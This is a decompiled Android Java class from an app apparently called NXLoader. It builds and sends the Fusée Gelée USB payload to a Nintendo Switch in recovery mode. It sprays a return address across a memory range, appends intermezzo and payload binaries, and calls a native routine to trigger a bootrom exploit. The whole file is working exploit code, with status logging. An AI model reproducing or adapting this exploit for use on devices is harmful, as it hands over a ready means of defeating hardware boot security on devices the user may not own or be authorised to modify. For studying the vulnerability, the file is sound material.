package io.github.davidbuchanan314.nxloader;

import android.content.Context;
import android.hardware.usb.UsbDevice;
import android.hardware.usb.UsbDeviceConnection;
import android.hardware.usb.UsbEndpoint;
import android.hardware.usb.UsbInterface;
import android.hardware.usb.UsbManager;
import android.support.v4.provider.FontsContractCompat;
import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.ByteBuffer;
import java.nio.ByteOrder;

/* loaded from: classes.dex */
public class PrimaryLoader implements USBDevHandler {
    private static final int INTERMEZZO_LOCATION = 1073868800;
    private static final int MAX_LENGTH = 197272;
    private static final int PAYLOAD_LOAD_BLOCK = 1073872896;
    private static final int RCM_PAYLOAD_ADDR = 1073807360;

    static {
        System.loadLibrary("native-lib");
    }

    private byte[] getPayload(Context context) throws IOException {
        InputStream fileInputStream;
        String string = context.getSharedPreferences("config", 4).getString(Constants.PREFERENCES_KEY, null);
        if (string == null) {
            Logger.log(context, "[*] Opening default payload (fusee.bin)");
            fileInputStream = context.getAssets().open("fusee.bin");
        } else {
            Logger.log(context, "[*] Opening custom payload (" + string + ")");
            StringBuilder sb = new StringBuilder();
            sb.append(context.getFilesDir().getPath());
            sb.append("/payload.bin");
            fileInputStream = new FileInputStream(sb.toString());
        }
        byte[] bArr = new byte[fileInputStream.available()];
        Logger.log(context, "[+] Read " + Integer.toString(fileInputStream.read(bArr)) + " bytes from payload file");
        fileInputStream.close();
        return bArr;
    }

    @Override // io.github.davidbuchanan314.nxloader.USBDevHandler
    public void handleDevice(Context context, UsbDevice usbDevice) {
        Logger.log(context, "[+] Launching primary payload!!!");
        UsbManager usbManager = (UsbManager) context.getSystemService("usb");
        int i = 0;
        UsbInterface usbInterface = usbDevice.getInterface(0);
        UsbEndpoint endpoint = usbInterface.getEndpoint(0);
        boolean z = true;
        UsbEndpoint endpoint2 = usbInterface.getEndpoint(1);
        UsbDeviceConnection openDevice = usbManager.openDevice(usbDevice);
        openDevice.claimInterface(usbInterface, true);
        byte[] bArr = new byte[16];
        if (openDevice.bulkTransfer(endpoint, bArr, bArr.length, 999) != bArr.length) {
            Logger.log(context, "[-] Failed to read device ID, bailing out :(");
            return;
        }
        Logger.log(context, "[+] Read device ID: " + Utils.bytesToHex(bArr));
        ByteBuffer allocate = ByteBuffer.allocate(MAX_LENGTH);
        allocate.order(ByteOrder.LITTLE_ENDIAN);
        allocate.putInt(MAX_LENGTH);
        allocate.put(new byte[676]);
        for (int i2 = RCM_PAYLOAD_ADDR; i2 < INTERMEZZO_LOCATION; i2 += 4) {
            allocate.putInt(INTERMEZZO_LOCATION);
        }
        try {
            InputStream open = context.getAssets().open("intermezzo.bin");
            byte[] bArr2 = new byte[open.available()];
            open.read(bArr2);
            open.close();
            allocate.put(bArr2);
            allocate.put(new byte[4096 - bArr2.length]);
            try {
                allocate.put(getPayload(context));
                int position = allocate.position();
                allocate.position(0);
                byte[] bArr3 = new byte[4096];
                while (true) {
                    if (i >= position && !z) {
                        Logger.log(context, "[+] Sent " + Integer.toString(i) + " bytes");
                        switch (nativeTriggerExploit(openDevice.getFileDescriptor(), 28672)) {
                            case FontsContractCompat.FontRequestCallback.FAIL_REASON_SECURITY_VIOLATION /* -4 */:
                                Logger.log(context, "[-] Wrong URB reaped :( Maybe that doesn't matter?");
                                break;
                            case FontsContractCompat.FontRequestCallback.FAIL_REASON_FONT_LOAD_ERROR /* -3 */:
                                Logger.log(context, "[-] REAPURB failed :(");
                                break;
                            case -2:
                                Logger.log(context, "[-] DISCARDURB failed :(");
                                break;
                            case -1:
                                Logger.log(context, "[-] SUBMITURB failed :(");
                                break;
                            case 0:
                                Logger.log(context, "[+] Exploit triggered!");
                                break;
                            default:
                                Logger.log(context, "[-] How did you get here!?");
                                return;
                        }
                        openDevice.releaseInterface(usbInterface);
                        openDevice.close();
                        return;
                    }
                    allocate.get(bArr3);
                    if (openDevice.bulkTransfer(endpoint2, bArr3, bArr3.length, 999) != bArr3.length) {
                        Logger.log(context, "[-] Sending payload failed at offset " + Integer.toString(i));
                        return;
                    }
                    z = !z;
                    i += 4096;
                }
            } catch (IOException e) {
                Logger.log(context, "[-] Failed to read payload: " + e.toString());
            }
        } catch (IOException e2) {
            Logger.log(context, "[-] Failed to read intermezzo: " + e2.toString());
        }
    }

    public native int nativeTriggerExploit(int i, int i2);
}
